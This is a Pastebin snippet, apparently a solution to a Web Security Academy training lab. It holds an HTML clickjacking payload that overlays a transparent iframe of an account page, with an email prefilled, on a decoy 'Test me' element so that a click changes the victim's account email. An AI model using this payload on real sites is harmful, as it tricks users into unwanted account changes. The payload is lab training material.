Advertisement
Mihao

Hacking S3 L16 - zadanie 2

Jun 16th, 2023
746
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 0.38 KB | None | 0 0
  1. <style>
  2.     iframe {
  3.         position:relative;
  4.         width: 700px;
  5.         height: 500px;
  6.         opacity: $opacity;
  7.         z-index: 2;
  8.     }
  9.     div {
  10.         position:absolute;
  11.         top: 400px;
  12.         left:80px;
  13.         z-index: 1;
  14.     }
  15. </style>
  16. <div>Test me</div>
  17. <iframe src="_LAB_ID_TU_WPISZ_.web-security-academy.net/my-account?email=mihao@email.com"></iframe>
  18.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement